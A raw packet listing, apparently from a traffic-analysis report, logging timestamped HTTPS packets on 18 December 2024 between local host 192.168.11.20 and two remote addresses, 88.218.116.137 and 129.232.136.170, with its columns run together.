                                                    Dec 18, 2024 11:18:13.524955988 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.524955988 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.578102112 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.813411951 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.813416958 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.813478947 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.813602924 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.813604116 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.813623905 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.813623905 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.813632965 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.813700914 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.813803911 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.814369917 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.814383030 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.814551115 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.814551115 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.814605951 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.814616919 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.814625978 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.814702034 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.814862967 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.814870119 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.814877033 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.814924955 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.815021038 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.815108061 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.815108061 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.815108061 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.815123081 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:13.815207005 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:13.815291882 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.102986097 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.102989912 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.103050947 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.103168011 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.103243113 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.103243113 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.103250027 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.103430033 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.103800058 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.103812933 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.103986979 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.104051113 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.104058027 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.104233980 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.104765892 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.104783058 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.104937077 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105004072 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105004072 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105016947 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.105185986 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105643034 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.105662107 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.105829954 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105829954 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105881929 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105889082 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.105901003 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.105950117 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.106064081 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.106528044 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.106539965 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.106717110 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.106717110 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.106856108 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.106868029 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.107054949 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.107548952 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.107568026 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.107739925 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.107739925 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.107796907 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.107796907 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.107809067 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.107886076 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.107989073 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.392205000 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.392209053 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.392271996 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.392441034 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.392441034 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.392455101 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.392462969 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.392661095 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393383026 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.393403053 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.393579960 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393579960 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393646955 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393659115 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.393667936 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393667936 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393734932 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.393748045 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.393847942 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393860102 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.393939018 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.393939018 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.394035101 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.394627094 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.394639015 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.394840956 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.394840956 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.394855022 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.394862890 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.394862890 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395009995 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.395011902 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395024061 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.395134926 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.395191908 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395193100 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395211935 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395219088 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.395309925 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395309925 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395359039 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395693064 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.395713091 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.395829916 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395829916 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395876884 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.395881891 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.395972013 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.396023989 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.396747112 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.396759987 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.396928072 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397042990 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397042990 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397056103 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397115946 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397259951 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397267103 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397361040 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397428036 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397428036 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397502899 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397512913 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397528887 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397537947 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397675991 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397730112 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397730112 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397816896 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397821903 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.397828102 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397917986 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.397986889 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398075104 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398078918 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.398206949 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.398257971 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398266077 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.398374081 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398438931 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398526907 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.398530960 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398538113 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.398648977 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398698092 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398698092 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398746014 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398746014 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.398794889 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.437458992 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.437470913 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.437680006 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.437680006 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.437691927 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.437707901 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.438750982 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.682398081 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.682431936 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.682607889 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.682643890 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.682645082 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.682663918 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.682745934 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.682785034 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.682852030 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.682878017 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.682944059 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.683065891 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.683065891 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.683515072 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.683547020 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.683681965 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.683681965 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.683779001 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.683779001 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.683804035 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.683914900 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.683991909 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684010029 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.684111118 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684173107 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684253931 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684290886 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.684318066 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.684448004 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684587002 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684603930 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.684772968 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684818029 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.684849024 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.684976101 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.684976101 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685002089 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685013056 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685055017 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685055017 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685187101 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685199976 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685214996 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685276031 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685347080 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685347080 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685391903 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685401917 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685441971 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685539007 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685539007 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685591936 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685656071 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685734034 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685813904 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685813904 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685827971 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.685967922 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.685988903 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.686002016 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.686141014 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686141014 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686237097 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686237097 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686335087 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686458111 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.686490059 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.686609030 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686652899 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686652899 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686669111 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.686702013 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686702013 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686808109 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.686811924 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686829090 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.686956882 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686956882 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.686975956 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687057018 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687069893 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687114000 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687114000 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687201023 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687208891 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687223911 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687272072 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687350035 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687350035 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687464952 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687477112 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687598944 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687618971 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687640905 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.687762976 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687762976 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687809944 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687863111 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.687956095 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688040018 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688066006 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688191891 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688193083 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688239098 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688250065 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688291073 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688339949 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688433886 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688487053 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688622952 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688636065 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688740015 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688755989 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688791037 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688791037 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688888073 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688891888 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.688908100 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.688994884 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.689049959 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689049959 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689100027 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689110041 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.689194918 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689258099 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689440012 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.689465046 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.689585924 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689585924 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689697981 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.689709902 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.689841986 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.690457106 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.690493107 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.690654039 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.690654039 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.690692902 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.690710068 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.690756083 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.690845013 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.690857887 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.690881014 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.691035032 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691035032 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691118002 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691307068 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.691333055 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.691457987 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691457987 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691488028 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.691512108 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691524029 CET4434971988.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:18:14.691587925 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691699028 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:14.691870928 CET49719443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:18:28.549964905 CET49720443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:18:28.550057888 CET44349720129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:18:28.550223112 CET49720443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:18:28.550333977 CET49720443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:18:28.550360918 CET44349720129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:18:29.388103008 CET44349720129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:18:29.389128923 CET49720443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:18:29.389194012 CET44349720129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:18:31.631352901 CET44349720129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:18:31.631373882 CET44349720129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:18:31.631529093 CET49720443192.168.11.20129.232.136.170
